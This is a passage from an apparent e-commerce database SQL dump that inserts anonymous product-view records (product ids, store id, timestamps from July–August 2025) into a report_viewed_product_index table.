(18356, NULL, NULL, 2055, 1, '2025-07-13 09:23:17'),
(18357, NULL, NULL, 2054, 1, '2025-07-13 09:33:02'),
(18358, NULL, NULL, 2064, 1, '2025-07-13 09:40:28'),
(18359, NULL, NULL, 2059, 1, '2025-07-13 09:53:49'),
(18360, NULL, NULL, 2055, 1, '2025-07-13 10:11:51'),
(18361, NULL, NULL, 2053, 1, '2025-07-13 10:56:02'),
(18362, NULL, NULL, 2062, 1, '2025-07-13 14:25:57'),
(18363, NULL, NULL, 2059, 1, '2025-07-13 15:47:40'),
(18364, NULL, NULL, 2060, 1, '2025-07-13 16:16:16'),
(18365, NULL, NULL, 2062, 1, '2025-07-13 18:20:06'),
(18366, NULL, NULL, 2055, 1, '2025-07-13 20:56:02'),
(18367, NULL, NULL, 2054, 1, '2025-07-13 21:38:56'),
(18368, NULL, NULL, 2060, 1, '2025-07-13 22:17:07'),
(18369, NULL, NULL, 2061, 1, '2025-07-13 22:29:47'),
(18370, NULL, NULL, 2060, 1, '2025-07-13 22:32:15'),
(18371, NULL, NULL, 2064, 1, '2025-07-13 23:35:25'),
(18372, NULL, NULL, 2062, 1, '2025-07-14 01:00:32'),
(18373, NULL, NULL, 2059, 1, '2025-07-14 01:43:18'),
(18374, NULL, NULL, 2062, 1, '2025-07-14 07:02:35'),
(18375, NULL, NULL, 2055, 1, '2025-07-14 12:02:21'),
(18376, NULL, NULL, 2059, 1, '2025-07-14 12:02:25'),
(18377, NULL, NULL, 2054, 1, '2025-07-14 12:02:26'),
(18378, NULL, NULL, 2060, 1, '2025-07-14 12:02:26'),
(18379, NULL, NULL, 2061, 1, '2025-07-14 12:02:28'),
(18380, NULL, NULL, 2062, 1, '2025-07-14 12:02:30'),
(18381, NULL, NULL, 2064, 1, '2025-07-14 12:02:32'),
(18382, NULL, NULL, 2058, 1, '2025-07-14 12:02:33'),
(18383, NULL, NULL, 2063, 1, '2025-07-14 12:02:34'),
(18384, NULL, NULL, 2053, 1, '2025-07-14 12:58:16'),
(18385, NULL, NULL, 2064, 1, '2025-07-14 13:12:50'),
(18386, NULL, NULL, 2062, 1, '2025-07-14 14:55:50'),
(18387, NULL, NULL, 2064, 1, '2025-07-14 15:37:57'),
(18388, NULL, NULL, 2059, 1, '2025-07-14 16:08:41'),
(18389, NULL, NULL, 2058, 1, '2025-07-14 17:50:39'),
(18390, NULL, NULL, 2053, 1, '2025-07-14 18:09:04'),
(18391, NULL, NULL, 2060, 1, '2025-07-14 18:50:19'),
(18392, NULL, NULL, 2060, 1, '2025-07-14 19:18:03'),
(18393, NULL, NULL, 2063, 1, '2025-07-14 21:23:12'),
(18394, NULL, NULL, 2054, 1, '2025-07-14 22:37:07'),
(18395, NULL, NULL, 2062, 1, '2025-07-14 23:14:55'),
(18396, NULL, NULL, 2061, 1, '2025-07-14 23:14:59'),
(18397, NULL, NULL, 2063, 1, '2025-07-14 23:15:03'),
(18398, NULL, NULL, 2053, 1, '2025-07-15 01:10:51'),
(18399, NULL, NULL, 2063, 1, '2025-07-15 01:24:08'),
(18400, NULL, NULL, 2060, 1, '2025-07-15 01:30:32'),
(18401, NULL, NULL, 2054, 1, '2025-07-15 01:31:58'),
(18402, NULL, NULL, 2064, 1, '2025-07-15 05:12:55'),
(18403, NULL, NULL, 2064, 1, '2025-07-15 05:31:43'),
(18404, NULL, NULL, 2062, 1, '2025-07-15 05:33:35'),
(18405, NULL, NULL, 2054, 1, '2025-07-15 06:08:10'),
(18406, NULL, NULL, 2055, 1, '2025-07-15 06:08:17'),
(18407, NULL, NULL, 2058, 1, '2025-07-15 06:08:22'),
(18408, NULL, NULL, 2059, 1, '2025-07-15 06:08:30'),
(18409, NULL, NULL, 2060, 1, '2025-07-15 06:08:37'),
(18410, NULL, NULL, 2061, 1, '2025-07-15 06:08:43'),
(18411, NULL, NULL, 2062, 1, '2025-07-15 06:08:46'),
(18412, NULL, NULL, 2063, 1, '2025-07-15 06:08:50'),
(18413, NULL, NULL, 2064, 1, '2025-07-15 06:09:06'),
(18414, NULL, NULL, 2064, 1, '2025-07-15 06:09:14'),
(18415, NULL, NULL, 2064, 1, '2025-07-15 06:09:22'),
(18416, NULL, NULL, 2053, 1, '2025-07-15 06:16:03'),
(18417, NULL, NULL, 2060, 1, '2025-07-15 06:53:24'),
(18418, NULL, NULL, 2058, 1, '2025-07-15 07:08:22'),
(18419, NULL, NULL, 2063, 1, '2025-07-15 07:21:42'),
(18420, NULL, NULL, 2058, 1, '2025-07-15 08:39:36'),
(18421, NULL, NULL, 2064, 1, '2025-07-15 08:51:47'),
(18422, NULL, NULL, 2055, 1, '2025-07-15 12:16:05'),
(18423, NULL, NULL, 2059, 1, '2025-07-15 13:51:51'),
(18424, NULL, NULL, 2062, 1, '2025-07-15 14:29:10'),
(18425, NULL, NULL, 2060, 1, '2025-07-15 15:59:28'),
(18426, NULL, NULL, 2053, 1, '2025-07-15 19:15:12'),
(18427, NULL, NULL, 2058, 1, '2025-07-15 20:06:25'),
(18428, NULL, NULL, 2054, 1, '2025-07-15 20:06:27'),
(18429, NULL, NULL, 2060, 1, '2025-07-15 21:02:29'),
(18430, NULL, NULL, 2062, 1, '2025-07-15 21:14:50'),
(18431, NULL, NULL, 2063, 1, '2025-07-15 21:38:43'),
(18432, NULL, NULL, 2059, 1, '2025-07-15 22:41:11'),
(18433, NULL, NULL, 2053, 1, '2025-07-15 23:23:33'),
(18434, NULL, NULL, 2063, 1, '2025-07-16 01:19:36'),
(18435, NULL, NULL, 2053, 1, '2025-07-16 06:15:43'),
(18436, NULL, NULL, 2059, 1, '2025-07-16 07:00:15'),
(18437, NULL, NULL, 2061, 1, '2025-07-16 12:00:01'),
(18438, NULL, NULL, 2060, 1, '2025-07-16 14:12:23'),
(18439, NULL, NULL, 2062, 1, '2025-07-16 14:31:52'),
(18440, NULL, NULL, 2054, 1, '2025-07-16 19:01:33'),
(18441, NULL, NULL, 2058, 1, '2025-07-16 19:07:03'),
(18442, NULL, NULL, 2059, 1, '2025-07-16 19:27:25'),
(18443, NULL, NULL, 2064, 1, '2025-07-16 19:32:39'),
(18444, NULL, NULL, 2054, 1, '2025-07-16 19:55:33'),
(18445, NULL, NULL, 2060, 1, '2025-07-16 20:47:40'),
(18446, NULL, NULL, 2055, 1, '2025-07-16 21:10:22'),
(18447, NULL, NULL, 2059, 1, '2025-07-16 21:17:44'),
(18448, NULL, NULL, 2058, 1, '2025-07-16 23:06:10'),
(18449, NULL, NULL, 2060, 1, '2025-07-17 01:39:42'),
(18450, NULL, NULL, 2064, 1, '2025-07-17 02:08:28'),
(18451, NULL, NULL, 2061, 1, '2025-07-17 03:30:37'),
(18452, NULL, NULL, 2053, 1, '2025-07-17 04:03:11'),
(18453, NULL, NULL, 2064, 1, '2025-07-17 05:11:28'),
(18454, NULL, NULL, 2061, 1, '2025-07-17 05:43:29'),
(18455, NULL, NULL, 2064, 1, '2025-07-17 14:14:40');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(18456, NULL, NULL, 2062, 1, '2025-07-17 14:43:27'),
(18457, NULL, NULL, 2063, 1, '2025-07-17 15:07:14'),
(18458, NULL, NULL, 2054, 1, '2025-07-17 15:25:42'),
(18459, NULL, NULL, 2060, 1, '2025-07-17 16:26:05'),
(18460, NULL, NULL, 2061, 1, '2025-07-17 16:37:56'),
(18461, NULL, NULL, 2058, 1, '2025-07-17 16:51:33'),
(18462, NULL, NULL, 2055, 1, '2025-07-17 16:57:59'),
(18463, NULL, NULL, 2054, 1, '2025-07-17 17:07:42'),
(18464, NULL, NULL, 2064, 1, '2025-07-17 17:46:17'),
(18465, NULL, NULL, 2053, 1, '2025-07-17 20:07:02'),
(18466, NULL, NULL, 2055, 1, '2025-07-17 20:15:16'),
(18467, NULL, NULL, 2059, 1, '2025-07-17 21:06:03'),
(18468, NULL, NULL, 2064, 1, '2025-07-17 22:09:37'),
(18469, NULL, NULL, 2060, 1, '2025-07-17 23:42:05'),
(18470, NULL, NULL, 2064, 1, '2025-07-17 23:49:40'),
(18471, NULL, NULL, 2063, 1, '2025-07-17 23:59:05'),
(18472, NULL, NULL, 2064, 1, '2025-07-18 00:30:24'),
(18473, NULL, NULL, 2059, 1, '2025-07-18 00:39:43'),
(18474, NULL, NULL, 2062, 1, '2025-07-18 01:27:28'),
(18475, NULL, NULL, 2053, 1, '2025-07-18 04:00:07'),
(18476, NULL, NULL, 2062, 1, '2025-07-18 11:46:38'),
(18477, NULL, NULL, 2062, 1, '2025-07-18 14:37:04'),
(18478, NULL, NULL, 2064, 1, '2025-07-18 15:00:36'),
(18479, NULL, NULL, 2064, 1, '2025-07-18 15:22:06'),
(18480, NULL, NULL, 2053, 1, '2025-07-18 19:30:54'),
(18481, NULL, NULL, 2055, 1, '2025-07-18 19:40:03'),
(18482, NULL, NULL, 2060, 1, '2025-07-18 19:51:01'),
(18483, NULL, NULL, 2058, 1, '2025-07-18 19:51:41'),
(18484, NULL, NULL, 2061, 1, '2025-07-18 19:52:51'),
(18485, NULL, NULL, 2064, 1, '2025-07-18 19:54:07'),
(18486, NULL, NULL, 2062, 1, '2025-07-18 20:12:36'),
(18487, NULL, NULL, 2063, 1, '2025-07-18 20:32:44'),
(18488, NULL, NULL, 2055, 1, '2025-07-18 20:47:38'),
(18489, NULL, NULL, 2059, 1, '2025-07-18 20:49:30'),
(18490, NULL, NULL, 2054, 1, '2025-07-18 21:03:31'),
(18491, NULL, NULL, 2055, 1, '2025-07-18 22:38:47'),
(18492, NULL, NULL, 2064, 1, '2025-07-19 00:16:15'),
(18493, NULL, NULL, 2060, 1, '2025-07-19 01:53:02'),
(18494, NULL, NULL, 2053, 1, '2025-07-19 07:35:47'),
(18495, NULL, NULL, 2054, 1, '2025-07-19 07:57:22'),
(18496, NULL, NULL, 2064, 1, '2025-07-19 08:28:04'),
(18497, NULL, NULL, 2060, 1, '2025-07-19 08:30:03'),
(18498, NULL, NULL, 2053, 1, '2025-07-19 12:48:22'),
(18499, NULL, NULL, 2062, 1, '2025-07-19 14:39:15'),
(18500, NULL, NULL, 2061, 1, '2025-07-19 17:15:46'),
(18501, NULL, NULL, 2064, 1, '2025-07-19 17:52:41'),
(18502, NULL, NULL, 2060, 1, '2025-07-19 18:10:43'),
(18503, NULL, NULL, 2058, 1, '2025-07-19 18:55:25'),
(18504, NULL, NULL, 2060, 1, '2025-07-19 21:54:54'),
(18505, NULL, NULL, 2058, 1, '2025-07-19 22:14:43'),
(18506, NULL, NULL, 2054, 1, '2025-07-19 22:41:36'),
(18507, NULL, NULL, 2063, 1, '2025-07-19 23:07:31'),
(18508, NULL, NULL, 2053, 1, '2025-07-19 23:38:19'),
(18509, NULL, NULL, 2053, 1, '2025-07-19 23:44:43'),
(18510, NULL, NULL, 2062, 1, '2025-07-20 00:17:28'),
(18511, NULL, NULL, 2053, 1, '2025-07-20 00:42:13'),
(18512, NULL, NULL, 2053, 1, '2025-07-20 01:28:56'),
(18513, NULL, NULL, 2064, 1, '2025-07-20 05:03:34'),
(18514, NULL, NULL, 2062, 1, '2025-07-20 07:06:52'),
(18515, NULL, NULL, 2064, 1, '2025-07-20 07:17:33'),
(18516, NULL, NULL, 2064, 1, '2025-07-20 07:18:16'),
(18517, NULL, NULL, 2061, 1, '2025-07-20 07:23:39'),
(18518, NULL, NULL, 2058, 1, '2025-07-20 07:24:01'),
(18519, NULL, NULL, 2061, 1, '2025-07-20 08:35:29'),
(18520, NULL, NULL, 2062, 1, '2025-07-20 12:33:02'),
(18521, NULL, NULL, 2064, 1, '2025-07-20 14:50:40'),
(18522, NULL, NULL, 2054, 1, '2025-07-20 17:24:49'),
(18523, NULL, NULL, 2061, 1, '2025-07-20 18:10:28'),
(18524, NULL, NULL, 2062, 1, '2025-07-20 20:03:34'),
(18525, NULL, NULL, 2058, 1, '2025-07-20 20:10:39'),
(18526, NULL, NULL, 2060, 1, '2025-07-20 20:29:43'),
(18527, NULL, NULL, 2063, 1, '2025-07-20 22:42:22'),
(18528, NULL, NULL, 2063, 1, '2025-07-21 00:20:08'),
(18529, NULL, NULL, 2061, 1, '2025-07-21 00:20:15'),
(18530, NULL, NULL, 2062, 1, '2025-07-21 00:20:18'),
(18531, NULL, NULL, 2059, 1, '2025-07-21 00:46:39'),
(18532, NULL, NULL, 2063, 1, '2025-07-21 02:02:14'),
(18533, NULL, NULL, 2060, 1, '2025-07-21 05:17:27'),
(18534, NULL, NULL, 2061, 1, '2025-07-21 05:32:31'),
(18535, NULL, NULL, 2063, 1, '2025-07-21 05:35:28'),
(18536, NULL, NULL, 2058, 1, '2025-07-21 06:21:14'),
(18537, NULL, NULL, 2055, 1, '2025-07-21 07:46:57'),
(18538, NULL, NULL, 2061, 1, '2025-07-21 09:31:41'),
(18539, NULL, NULL, 2060, 1, '2025-07-21 09:53:25'),
(18540, NULL, NULL, 2061, 1, '2025-07-21 10:02:16'),
(18541, NULL, NULL, 2054, 1, '2025-07-21 10:26:23'),
(18542, NULL, NULL, 2062, 1, '2025-07-21 11:10:40'),
(18543, NULL, NULL, 2059, 1, '2025-07-21 11:58:18'),
(18544, NULL, NULL, 2054, 1, '2025-07-21 13:19:32'),
(18545, NULL, NULL, 2059, 1, '2025-07-21 13:47:45'),
(18546, NULL, NULL, 2055, 1, '2025-07-21 14:10:03'),
(18547, NULL, NULL, 2064, 1, '2025-07-21 14:10:26'),
(18548, NULL, NULL, 2062, 1, '2025-07-21 14:20:02'),
(18549, NULL, NULL, 2055, 1, '2025-07-21 17:16:51'),
(18550, NULL, NULL, 2053, 1, '2025-07-21 19:31:58'),
(18551, NULL, NULL, 2053, 1, '2025-07-21 19:43:16'),
(18552, NULL, NULL, 2054, 1, '2025-07-21 20:55:30'),
(18553, NULL, NULL, 2055, 1, '2025-07-21 21:28:39'),
(18554, NULL, NULL, 2053, 1, '2025-07-21 23:16:23'),
(18555, NULL, NULL, 2053, 1, '2025-07-22 06:37:36'),
(18556, NULL, NULL, 2054, 1, '2025-07-22 07:21:11'),
(18557, NULL, NULL, 2063, 1, '2025-07-22 08:27:48'),
(18558, NULL, NULL, 2060, 1, '2025-07-22 08:29:32'),
(18559, NULL, NULL, 2058, 1, '2025-07-22 12:17:46'),
(18560, NULL, NULL, 2061, 1, '2025-07-22 12:18:30'),
(18561, NULL, NULL, 2059, 1, '2025-07-22 12:18:40'),
(18562, NULL, NULL, 2060, 1, '2025-07-22 12:18:50'),
(18563, NULL, NULL, 2062, 1, '2025-07-22 12:18:59'),
(18564, NULL, NULL, 2063, 1, '2025-07-22 12:19:08'),
(18565, NULL, NULL, 2064, 1, '2025-07-22 12:19:19'),
(18566, NULL, NULL, 2055, 1, '2025-07-22 12:21:10'),
(18567, NULL, NULL, 2054, 1, '2025-07-22 12:21:24'),
(18568, NULL, NULL, 2053, 1, '2025-07-22 12:21:37'),
(18569, NULL, NULL, 2058, 1, '2025-07-22 12:55:39'),
(18570, NULL, NULL, 2061, 1, '2025-07-22 12:55:52'),
(18571, NULL, NULL, 2059, 1, '2025-07-22 12:56:06'),
(18572, NULL, NULL, 2060, 1, '2025-07-22 12:56:18'),
(18573, NULL, NULL, 2062, 1, '2025-07-22 12:56:34'),
(18574, NULL, NULL, 2063, 1, '2025-07-22 12:56:47'),
(18575, NULL, NULL, 2064, 1, '2025-07-22 12:57:00'),
(18576, NULL, NULL, 2055, 1, '2025-07-22 12:59:05'),
(18577, NULL, NULL, 2054, 1, '2025-07-22 12:59:19'),
(18578, NULL, NULL, 2053, 1, '2025-07-22 12:59:33'),
(18579, NULL, NULL, 2058, 1, '2025-07-22 13:09:54'),
(18580, NULL, NULL, 2062, 1, '2025-07-22 14:26:03'),
(18581, NULL, NULL, 2061, 1, '2025-07-22 16:38:03'),
(18582, NULL, NULL, 2058, 1, '2025-07-22 16:50:29'),
(18583, NULL, NULL, 2055, 1, '2025-07-22 17:01:05'),
(18584, NULL, NULL, 2054, 1, '2025-07-22 17:11:28'),
(18585, NULL, NULL, 2054, 1, '2025-07-22 18:12:37'),
(18586, NULL, NULL, 2059, 1, '2025-07-22 19:28:59'),
(18587, NULL, NULL, 2064, 1, '2025-07-22 19:31:47'),
(18588, NULL, NULL, 2060, 1, '2025-07-22 21:43:19'),
(18589, NULL, NULL, 2059, 1, '2025-07-22 21:43:27'),
(18590, NULL, NULL, 2062, 1, '2025-07-22 23:26:20'),
(18591, NULL, NULL, 2060, 1, '2025-07-22 23:45:38'),
(18592, NULL, NULL, 2064, 1, '2025-07-23 00:15:57'),
(18593, NULL, NULL, 2060, 1, '2025-07-23 00:46:41'),
(18594, NULL, NULL, 2064, 1, '2025-07-23 06:30:56'),
(18595, NULL, NULL, 2063, 1, '2025-07-23 06:40:06'),
(18596, NULL, NULL, 2064, 1, '2025-07-23 06:55:52'),
(18597, NULL, NULL, 2061, 1, '2025-07-23 06:58:09'),
(18598, NULL, NULL, 2059, 1, '2025-07-23 07:02:22'),
(18599, NULL, NULL, 2058, 1, '2025-07-23 07:18:59'),
(18600, NULL, NULL, 2063, 1, '2025-07-23 07:31:30'),
(18601, NULL, NULL, 2054, 1, '2025-07-23 08:55:32'),
(18602, NULL, NULL, 2058, 1, '2025-07-23 08:55:34'),
(18603, NULL, NULL, 2062, 1, '2025-07-23 14:44:32'),
(18604, NULL, NULL, 2060, 1, '2025-07-23 15:14:49'),
(18605, NULL, NULL, 2061, 1, '2025-07-23 15:15:27'),
(18606, NULL, NULL, 2053, 1, '2025-07-23 15:15:28'),
(18607, NULL, NULL, 2061, 1, '2025-07-23 18:11:43'),
(18608, NULL, NULL, 2058, 1, '2025-07-23 19:55:43'),
(18609, NULL, NULL, 2053, 1, '2025-07-23 20:23:18'),
(18610, NULL, NULL, 2060, 1, '2025-07-24 01:29:13'),
(18611, NULL, NULL, 2062, 1, '2025-07-24 05:35:41'),
(18612, NULL, NULL, 2060, 1, '2025-07-24 07:58:33'),
(18613, NULL, NULL, 2061, 1, '2025-07-24 09:46:44'),
(18614, NULL, NULL, 2054, 1, '2025-07-24 12:09:38'),
(18615, NULL, NULL, 2061, 1, '2025-07-24 12:49:33'),
(18616, NULL, NULL, 2061, 1, '2025-07-24 13:40:36'),
(18617, NULL, NULL, 2062, 1, '2025-07-24 14:53:09'),
(18618, NULL, NULL, 2060, 1, '2025-07-24 15:12:15'),
(18619, NULL, NULL, 2061, 1, '2025-07-25 00:54:23'),
(18620, NULL, NULL, 2061, 1, '2025-07-25 04:17:57'),
(18621, NULL, NULL, 2060, 1, '2025-07-25 04:28:52'),
(18622, NULL, NULL, 2059, 1, '2025-07-25 05:42:43'),
(18623, NULL, NULL, 2060, 1, '2025-07-25 06:40:55'),
(18624, NULL, NULL, 2061, 1, '2025-07-25 07:15:31'),
(18625, NULL, NULL, 2053, 1, '2025-07-25 07:46:35'),
(18626, NULL, NULL, 2059, 1, '2025-07-25 08:40:26'),
(18627, NULL, NULL, 2053, 1, '2025-07-25 10:25:45'),
(18628, NULL, NULL, 2062, 1, '2025-07-25 10:26:46'),
(18629, NULL, NULL, 2064, 1, '2025-07-25 14:16:11'),
(18630, NULL, NULL, 2062, 1, '2025-07-25 14:54:34'),
(18631, NULL, NULL, 2064, 1, '2025-07-25 15:11:14'),
(18632, NULL, NULL, 2061, 1, '2025-07-25 17:19:38'),
(18633, NULL, NULL, 2064, 1, '2025-07-25 19:07:10'),
(18634, NULL, NULL, 2060, 1, '2025-07-25 21:49:35'),
(18635, NULL, NULL, 2054, 1, '2025-07-25 22:15:25'),
(18636, NULL, NULL, 2060, 1, '2025-07-25 22:19:41'),
(18637, NULL, NULL, 2058, 1, '2025-07-25 23:23:38'),
(18638, NULL, NULL, 2062, 1, '2025-07-26 02:09:52'),
(18639, NULL, NULL, 2062, 1, '2025-07-26 02:11:39'),
(18640, NULL, NULL, 2053, 1, '2025-07-26 02:11:56'),
(18641, NULL, NULL, 2061, 1, '2025-07-26 02:12:47'),
(18642, NULL, NULL, 2063, 1, '2025-07-26 02:13:31'),
(18643, NULL, NULL, 2063, 1, '2025-07-26 02:16:08'),
(18644, NULL, NULL, 2059, 1, '2025-07-26 02:21:03'),
(18645, NULL, NULL, 2058, 1, '2025-07-26 02:21:20'),
(18646, NULL, NULL, 2059, 1, '2025-07-26 02:23:08'),
(18647, NULL, NULL, 2055, 1, '2025-07-26 02:28:05'),
(18648, NULL, NULL, 2055, 1, '2025-07-26 02:32:38'),
(18649, NULL, NULL, 2054, 1, '2025-07-26 02:37:03'),
(18650, NULL, NULL, 2054, 1, '2025-07-26 02:41:24'),
(18651, NULL, NULL, 2060, 1, '2025-07-26 03:40:18'),
(18652, NULL, NULL, 2060, 1, '2025-07-26 03:48:04'),
(18653, NULL, NULL, 2060, 1, '2025-07-26 03:50:42'),
(18654, NULL, NULL, 2061, 1, '2025-07-26 05:22:30'),
(18655, NULL, NULL, 2059, 1, '2025-07-26 08:09:35'),
(18656, NULL, NULL, 2062, 1, '2025-07-26 14:17:31'),
(18657, NULL, NULL, 2062, 1, '2025-07-26 14:38:05'),
(18658, NULL, NULL, 2060, 1, '2025-07-26 14:38:53'),
(18659, NULL, NULL, 2060, 1, '2025-07-26 14:58:58'),
(18660, NULL, NULL, 2059, 1, '2025-07-26 16:30:26'),
(18661, NULL, NULL, 2060, 1, '2025-07-26 19:52:03'),
(18662, NULL, NULL, 2061, 1, '2025-07-26 22:36:12'),
(18663, NULL, NULL, 2063, 1, '2025-07-27 01:16:17'),
(18664, NULL, NULL, 2060, 1, '2025-07-27 01:46:22'),
(18665, NULL, NULL, 2054, 1, '2025-07-27 04:09:43'),
(18666, NULL, NULL, 2064, 1, '2025-07-27 08:53:52'),
(18667, NULL, NULL, 2061, 1, '2025-07-27 11:00:03'),
(18668, NULL, NULL, 2058, 1, '2025-07-27 13:25:06'),
(18669, NULL, NULL, 2061, 1, '2025-07-27 14:11:29'),
(18670, NULL, NULL, 2062, 1, '2025-07-27 14:18:21'),
(18671, NULL, NULL, 2060, 1, '2025-07-27 14:21:50'),
(18672, NULL, NULL, 2054, 1, '2025-07-27 17:38:01'),
(18673, NULL, NULL, 2061, 1, '2025-07-27 22:00:38'),
(18674, NULL, NULL, 2058, 1, '2025-07-27 22:11:20'),
(18675, NULL, NULL, 2055, 1, '2025-07-27 22:20:47'),
(18676, NULL, NULL, 2054, 1, '2025-07-27 22:31:10'),
(18677, NULL, NULL, 2063, 1, '2025-07-27 23:06:09'),
(18678, NULL, NULL, 2062, 1, '2025-07-27 23:06:13'),
(18679, NULL, NULL, 2061, 1, '2025-07-27 23:06:17'),
(18680, NULL, NULL, 2058, 1, '2025-07-27 23:11:01'),
(18681, NULL, NULL, 2061, 1, '2025-07-28 01:36:03'),
(18682, NULL, NULL, 2054, 1, '2025-07-28 03:03:10'),
(18683, NULL, NULL, 2055, 1, '2025-07-28 03:18:19'),
(18684, NULL, NULL, 2059, 1, '2025-07-28 03:39:46'),
(18685, NULL, NULL, 2060, 1, '2025-07-28 05:00:11'),
(18686, NULL, NULL, 2064, 1, '2025-07-28 05:08:39'),
(18687, NULL, NULL, 2059, 1, '2025-07-28 05:18:37'),
(18688, NULL, NULL, 2062, 1, '2025-07-28 05:49:06'),
(18689, NULL, NULL, 2064, 1, '2025-07-28 06:56:49'),
(18690, NULL, NULL, 2060, 1, '2025-07-28 06:58:08'),
(18691, NULL, NULL, 2061, 1, '2025-07-28 08:42:45'),
(18692, NULL, NULL, 2060, 1, '2025-07-28 10:24:10'),
(18693, NULL, NULL, 2064, 1, '2025-07-28 10:59:03'),
(18694, NULL, NULL, 2063, 1, '2025-07-28 11:10:34'),
(18695, NULL, NULL, 2060, 1, '2025-07-28 11:51:53'),
(18696, NULL, NULL, 2063, 1, '2025-07-28 12:10:09'),
(18697, NULL, NULL, 2055, 1, '2025-07-28 12:20:25'),
(18698, NULL, NULL, 2063, 1, '2025-07-28 13:08:44'),
(18699, NULL, NULL, 2055, 1, '2025-07-28 13:54:55'),
(18700, NULL, NULL, 2061, 1, '2025-07-28 14:10:06'),
(18701, NULL, NULL, 2062, 1, '2025-07-28 14:44:54'),
(18702, NULL, NULL, 2064, 1, '2025-07-28 15:07:53'),
(18703, NULL, NULL, 2061, 1, '2025-07-28 15:40:28'),
(18704, NULL, NULL, 2054, 1, '2025-07-28 22:03:38'),
(18705, NULL, NULL, 2059, 1, '2025-07-28 23:01:36'),
(18706, NULL, NULL, 2064, 1, '2025-07-28 23:17:11'),
(18707, NULL, NULL, 2064, 1, '2025-07-29 02:43:25'),
(18708, NULL, NULL, 2064, 1, '2025-07-29 04:56:24'),
(18709, NULL, NULL, 2059, 1, '2025-07-29 06:44:30'),
(18710, NULL, NULL, 2060, 1, '2025-07-29 06:44:33'),
(18711, NULL, NULL, 2058, 1, '2025-07-29 08:31:01'),
(18712, NULL, NULL, 2062, 1, '2025-07-29 08:43:10'),
(18713, NULL, NULL, 2061, 1, '2025-07-29 09:10:14'),
(18714, NULL, NULL, 2063, 1, '2025-07-29 10:07:12'),
(18715, NULL, NULL, 2060, 1, '2025-07-29 14:41:29'),
(18716, NULL, NULL, 2062, 1, '2025-07-29 14:56:42'),
(18717, NULL, NULL, 2063, 1, '2025-07-29 15:04:09'),
(18718, NULL, NULL, 2061, 1, '2025-07-29 16:34:23'),
(18719, NULL, NULL, 2054, 1, '2025-07-29 19:57:35'),
(18720, NULL, NULL, 2058, 1, '2025-07-29 19:57:38'),
(18721, NULL, NULL, 2058, 1, '2025-07-29 20:46:32'),
(18722, NULL, NULL, 2059, 1, '2025-07-29 22:45:17'),
(18723, NULL, NULL, 2063, 1, '2025-07-30 01:05:03'),
(18724, NULL, NULL, 2060, 1, '2025-07-30 02:29:31'),
(18725, NULL, NULL, 2063, 1, '2025-07-30 02:53:51'),
(18726, NULL, NULL, 2054, 1, '2025-07-30 05:16:00'),
(18727, NULL, NULL, 2055, 1, '2025-07-30 06:22:11'),
(18728, NULL, NULL, 2064, 1, '2025-07-30 08:53:25'),
(18729, NULL, NULL, 2059, 1, '2025-07-30 09:09:36'),
(18730, NULL, NULL, 2058, 1, '2025-07-30 09:13:32'),
(18731, NULL, NULL, 2064, 1, '2025-07-30 10:24:55'),
(18732, NULL, NULL, 2061, 1, '2025-07-30 10:35:37'),
(18733, NULL, NULL, 2054, 1, '2025-07-30 10:51:58'),
(18734, NULL, NULL, 2053, 1, '2025-07-30 11:49:04'),
(18735, NULL, NULL, 2060, 1, '2025-07-30 13:53:45'),
(18736, NULL, NULL, 2053, 1, '2025-07-30 14:14:59'),
(18737, NULL, NULL, 2060, 1, '2025-07-30 14:29:22'),
(18738, NULL, NULL, 2063, 1, '2025-07-30 14:33:09'),
(18739, NULL, NULL, 2053, 1, '2025-07-30 16:14:30'),
(18740, NULL, NULL, 2062, 1, '2025-07-30 16:43:10'),
(18741, NULL, NULL, 2060, 1, '2025-07-30 18:40:13'),
(18742, NULL, NULL, 2064, 1, '2025-07-30 18:59:30'),
(18743, NULL, NULL, 2064, 1, '2025-07-30 20:15:14'),
(18744, NULL, NULL, 2058, 1, '2025-07-30 23:33:57'),
(18745, NULL, NULL, 2060, 1, '2025-07-31 01:56:18'),
(18746, NULL, NULL, 2061, 1, '2025-07-31 02:13:50'),
(18747, NULL, NULL, 2060, 1, '2025-07-31 05:40:22'),
(18748, NULL, NULL, 2055, 1, '2025-07-31 05:57:35'),
(18749, NULL, NULL, 2054, 1, '2025-07-31 06:03:00'),
(18750, NULL, NULL, 2064, 1, '2025-07-31 06:12:56'),
(18751, NULL, NULL, 2061, 1, '2025-07-31 07:38:44'),
(18752, NULL, NULL, 2059, 1, '2025-07-31 09:26:49'),
(18753, NULL, NULL, 2058, 1, '2025-07-31 14:08:36'),
(18754, NULL, NULL, 2062, 1, '2025-07-31 14:36:56'),
(18755, NULL, NULL, 2064, 1, '2025-07-31 16:00:47'),
(18756, NULL, NULL, 2064, 1, '2025-07-31 17:54:12'),
(18757, NULL, NULL, 2059, 1, '2025-07-31 17:59:17'),
(18758, NULL, NULL, 2060, 1, '2025-07-31 19:15:22'),
(18759, NULL, NULL, 2061, 1, '2025-07-31 20:54:16'),
(18760, NULL, NULL, 2064, 1, '2025-07-31 21:01:50'),
(18761, NULL, NULL, 2064, 1, '2025-07-31 21:03:41'),
(18762, NULL, NULL, 2058, 1, '2025-07-31 21:07:22'),
(18763, NULL, NULL, 2053, 1, '2025-07-31 23:30:50'),
(18764, NULL, NULL, 2060, 1, '2025-08-01 00:07:10'),
(18765, NULL, NULL, 2053, 1, '2025-08-01 00:18:28'),
(18766, NULL, NULL, 2062, 1, '2025-08-01 00:24:09'),
(18767, NULL, NULL, 2064, 1, '2025-08-01 00:42:15'),
(18768, NULL, NULL, 2053, 1, '2025-08-01 02:04:05'),
(18769, NULL, NULL, 2061, 1, '2025-08-01 03:13:19'),
(18770, NULL, NULL, 2060, 1, '2025-08-01 05:25:37'),
(18771, NULL, NULL, 2060, 1, '2025-08-01 09:37:24'),
(18772, NULL, NULL, 2062, 1, '2025-08-01 09:46:45'),
(18773, NULL, NULL, 2063, 1, '2025-08-01 10:12:40'),
(18774, NULL, NULL, 2062, 1, '2025-08-01 14:29:49'),
(18775, NULL, NULL, 2061, 1, '2025-08-01 21:35:23'),
(18776, NULL, NULL, 2058, 1, '2025-08-01 21:44:15'),
(18777, NULL, NULL, 2055, 1, '2025-08-01 21:58:00'),
(18778, NULL, NULL, 2054, 1, '2025-08-01 22:07:06'),
(18779, NULL, NULL, 2060, 1, '2025-08-01 23:23:31'),
(18780, NULL, NULL, 2063, 1, '2025-08-01 23:31:42'),
(18781, NULL, NULL, 2062, 1, '2025-08-01 23:49:17'),
